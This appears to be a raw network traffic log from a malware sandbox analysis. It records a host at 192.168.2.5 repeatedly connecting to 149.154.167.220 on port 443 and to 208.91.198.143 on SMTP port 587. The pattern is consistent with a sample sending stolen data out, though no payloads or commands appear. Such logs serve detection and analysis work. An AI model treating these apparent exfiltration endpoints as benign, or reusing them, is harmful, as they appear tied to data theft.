                                                                          Sep 19, 2024 12:24:21.439317942 CEST44361667149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:21.441282988 CEST61667443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:21.441344023 CEST44361667149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:21.441400051 CEST61667443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:21.441418886 CEST44361667149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:21.461950064 CEST58761668208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:21.462079048 CEST61668587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:21.469763994 CEST58761668208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:21.623764038 CEST58761668208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:21.623915911 CEST61668587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:21.630861998 CEST58761668208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:21.749814987 CEST44361667149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:21.750077009 CEST44361667149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:21.750165939 CEST61667443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:21.750425100 CEST61667443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:21.751516104 CEST61669587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:21.757841110 CEST58761669208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:21.757930994 CEST61669587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:21.783379078 CEST58761668208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:21.783591986 CEST61668587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:21.790582895 CEST58761668208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:22.305737019 CEST58761669208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:22.305890083 CEST61669587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:22.310971022 CEST58761669208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:22.461276054 CEST58761669208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:22.462626934 CEST61669587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:22.467514038 CEST58761669208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:22.620266914 CEST58761669208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:22.620492935 CEST61669587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:22.625359058 CEST58761669208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:23.531234980 CEST58761668208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:23.531399012 CEST61668587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:23.536520958 CEST58761668208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:23.696309090 CEST58761668208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:23.696528912 CEST61668587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:23.703147888 CEST58761668208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:23.871824980 CEST58761668208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:23.910556078 CEST61668587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:23.915781975 CEST58761668208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:23.915849924 CEST61668587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:23.921715021 CEST61670443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:23.921821117 CEST44361670149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:23.921894073 CEST61670443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:23.922249079 CEST61670443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:23.922300100 CEST44361670149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:24.467552900 CEST58761669208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:24.467880011 CEST61669587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:24.473583937 CEST58761669208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:24.558295965 CEST44361670149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:24.564359903 CEST61670443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:24.564446926 CEST44361670149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:24.564661026 CEST61670443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:24.564677000 CEST44361670149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:24.624241114 CEST58761669208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:24.628606081 CEST61669587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:24.633702040 CEST58761669208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:24.802997112 CEST58761669208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:24.806828022 CEST61669587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:24.811012983 CEST61671443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:24.811106920 CEST44361671149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:24.812180996 CEST58761669208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:24.812289000 CEST61671443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:24.812431097 CEST61669587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:24.812547922 CEST61671443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:24.812597990 CEST44361671149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:25.059478998 CEST44361670149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:25.059679985 CEST44361670149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:25.063342094 CEST61670443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:25.064569950 CEST61670443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:25.064584017 CEST61672587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:25.069667101 CEST58761672208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:25.070925951 CEST61672587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:25.275979042 CEST61672587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:25.279351950 CEST61673443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:25.279413939 CEST44361673149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:25.279478073 CEST61673443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:25.279815912 CEST61673443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:25.279833078 CEST44361673149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:25.281018019 CEST58761672208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:25.281076908 CEST61672587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:25.519666910 CEST44361671149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:25.521636009 CEST61671443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:25.521696091 CEST44361671149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:25.521753073 CEST61671443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:25.521774054 CEST44361671149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:25.826044083 CEST44361671149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:25.826131105 CEST44361671149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:25.826312065 CEST61671443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:25.826766014 CEST61671443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:25.828119993 CEST61674587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:25.833121061 CEST58761674208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:25.833189964 CEST61674587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:25.888879061 CEST44361673149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:25.890948057 CEST61673443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:25.891011953 CEST44361673149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:25.891074896 CEST61673443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:25.891098022 CEST44361673149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:26.194468021 CEST44361673149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:26.195060015 CEST44361673149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:26.195852041 CEST61673443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:26.195852041 CEST61673443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:26.198400974 CEST61675587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:26.203339100 CEST58761675208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:26.207496881 CEST61675587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:26.381696939 CEST58761674208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:26.387403965 CEST61674587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:26.392855883 CEST58761674208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:26.542381048 CEST58761674208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:26.567413092 CEST61674587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:26.572479963 CEST58761674208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:26.724931002 CEST58761674208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:26.726783037 CEST61674587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:26.732038975 CEST58761674208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:26.762228012 CEST58761675208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:26.762525082 CEST61675587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:26.767560005 CEST58761675208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:26.917865038 CEST58761675208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:26.921818972 CEST61675587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:26.927036047 CEST58761675208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:27.080142021 CEST58761675208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:27.080562115 CEST61675587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:27.085655928 CEST58761675208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:28.294209003 CEST61676443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:28.294265985 CEST44361676149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:28.295241117 CEST61674587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:28.295571089 CEST61676443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:28.295571089 CEST61676443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:28.295610905 CEST44361676149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:28.302022934 CEST58761674208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:28.303663969 CEST61674587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:28.909476042 CEST44361676149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:28.915735006 CEST61676443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:28.915760994 CEST44361676149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:28.915895939 CEST61676443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:28.915900946 CEST44361676149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:29.233027935 CEST44361676149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:29.233133078 CEST44361676149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:29.233176947 CEST61676443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:29.261425018 CEST61676443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:29.266450882 CEST61677587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:29.527757883 CEST58761675208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:29.527926922 CEST61675587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:29.529088974 CEST58761677208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:29.529161930 CEST61677587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:29.532845020 CEST58761675208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:29.683679104 CEST58761675208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:29.683917046 CEST61675587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:29.688978910 CEST58761675208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:29.855340958 CEST58761675208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:29.855609894 CEST61675587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:29.859069109 CEST61678443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:29.859105110 CEST44361678149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:29.859157085 CEST61678443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:29.859424114 CEST61678443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:29.859436035 CEST44361678149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:29.860888004 CEST58761675208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:29.860948086 CEST61675587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:30.073389053 CEST58761677208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:30.073538065 CEST61677587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:30.078466892 CEST58761677208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:30.228236914 CEST58761677208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:30.231462955 CEST61677587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:30.236360073 CEST58761677208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:30.388480902 CEST58761677208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:30.396390915 CEST61677587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:30.402178049 CEST58761677208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:30.506653070 CEST44361678149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:30.508761883 CEST61678443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:30.508790016 CEST44361678149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:30.508971930 CEST61678443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:30.508976936 CEST44361678149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:31.807835102 CEST44361678149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:31.808103085 CEST44361678149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:31.808162928 CEST61678443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:31.808443069 CEST61678443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:31.809407949 CEST61679587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:32.031857014 CEST58761679208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:32.031946898 CEST61679587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:32.474282026 CEST58761677208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:32.474591970 CEST61677587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:32.480324984 CEST58761677208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:32.581605911 CEST58761679208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:32.581764936 CEST61679587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:32.589157104 CEST58761679208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:32.630568981 CEST58761677208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:32.630729914 CEST61677587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:32.635674000 CEST58761677208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:32.738739967 CEST58761679208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:32.744388103 CEST61679587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:32.751164913 CEST58761679208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:33.000521898 CEST58761677208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:33.000772953 CEST58761679208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:33.004554033 CEST61679587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:33.004565001 CEST61677587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:33.008378983 CEST61680443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:33.008443117 CEST44361680149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:33.009526968 CEST58761679208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:33.012717962 CEST61680443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:33.012717962 CEST61680443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:33.012794971 CEST44361680149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:33.013261080 CEST58761677208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:33.020380974 CEST61677587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:33.759241104 CEST44361680149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:33.761653900 CEST61680443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:33.761707067 CEST44361680149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:33.761785030 CEST61680443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:33.761812925 CEST44361680149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:34.088459969 CEST61679587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:34.091015100 CEST61681443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:34.091046095 CEST44361681149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:34.091110945 CEST61681443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:34.091325045 CEST61681443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:34.091344118 CEST44361681149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:34.093816996 CEST58761679208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:34.093868971 CEST61679587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:34.154848099 CEST44361680149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:34.155038118 CEST44361680149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:34.156788111 CEST61680443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:34.156788111 CEST61680443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:34.172386885 CEST61682587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:34.178766966 CEST58761682208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:34.183397055 CEST61682587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:34.725971937 CEST44361681149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:34.730407000 CEST61681443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:34.730439901 CEST44361681149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:34.737231016 CEST58761682208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:34.737276077 CEST61681443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:34.737287045 CEST44361681149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:34.742543936 CEST61682587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:34.747509956 CEST58761682208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:35.088757038 CEST58761682208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:35.089078903 CEST44361681149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:35.089159966 CEST44361681149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:35.090626001 CEST61682587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:35.090629101 CEST61681443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:35.096498013 CEST61681443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:35.099411011 CEST61683587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:35.302448988 CEST58761682208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:35.302525997 CEST61682587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:35.304506063 CEST58761682208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:35.304543972 CEST58761683208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:35.304616928 CEST61683587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:35.456424952 CEST58761682208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:35.467461109 CEST61682587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:35.472580910 CEST58761682208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:35.848872900 CEST58761683208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:35.848992109 CEST61683587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:35.853954077 CEST58761683208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:36.002737045 CEST58761683208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:36.002895117 CEST61683587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:36.008375883 CEST58761683208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:36.159444094 CEST58761683208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:36.162899017 CEST61683587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:36.167850971 CEST58761683208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:37.476744890 CEST58761682208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:37.476919889 CEST61682587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:37.481899023 CEST58761682208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:37.632280111 CEST58761682208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:37.632471085 CEST61682587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:37.638052940 CEST58761682208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:37.812377930 CEST58761682208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:37.812769890 CEST61682587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:37.818053007 CEST58761682208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:37.818115950 CEST61682587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:37.818161011 CEST61684443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:37.818201065 CEST44361684149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:37.818249941 CEST61684443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:37.818562031 CEST61684443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:37.818578005 CEST44361684149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:38.444145918 CEST44361684149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:38.445944071 CEST61684443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:38.445974112 CEST44361684149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:38.446288109 CEST61684443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:38.446296930 CEST44361684149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:38.535079956 CEST58761683208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:38.536766052 CEST61683587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:38.541712046 CEST58761683208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:38.692878008 CEST58761683208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:38.696254015 CEST61683587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:38.701204062 CEST58761683208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:38.869651079 CEST58761683208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:38.873078108 CEST61683587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:38.875005007 CEST61685443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:38.875096083 CEST44361685149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:38.878246069 CEST58761683208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:38.880453110 CEST61685443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:38.880526066 CEST61683587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:38.880672932 CEST61685443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:38.880712032 CEST44361685149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:38.894005060 CEST44361684149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:38.894198895 CEST44361684149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:38.896857977 CEST61684443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:38.897260904 CEST61684443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:38.898816109 CEST61686587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:38.903783083 CEST58761686208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:38.908516884 CEST61686587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:39.483246088 CEST58761686208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:39.483376026 CEST61686587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:39.488367081 CEST58761686208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:39.498749971 CEST44361685149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:39.500536919 CEST61685443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:39.500576019 CEST44361685149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:39.500643969 CEST61685443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:39.500663042 CEST44361685149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:39.643723011 CEST58761686208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:39.643903971 CEST61686587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:39.648834944 CEST58761686208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:39.806859016 CEST58761686208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:39.807087898 CEST61686587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:39.812386990 CEST58761686208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:39.896924973 CEST44361685149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:39.897010088 CEST44361685149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:24:39.897072077 CEST61685443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:39.897553921 CEST61685443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:24:39.898814917 CEST61687587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:39.903708935 CEST58761687208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:39.903789043 CEST61687587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:40.450320005 CEST58761687208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:40.451070070 CEST61687587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:40.456196070 CEST58761687208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:41.378544092 CEST58761687208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:41.378725052 CEST61687587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:41.378796101 CEST58761687208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:41.378886938 CEST58761687208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:41.378901005 CEST61687587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:41.378935099 CEST61687587192.168.2.5208.91.198.143
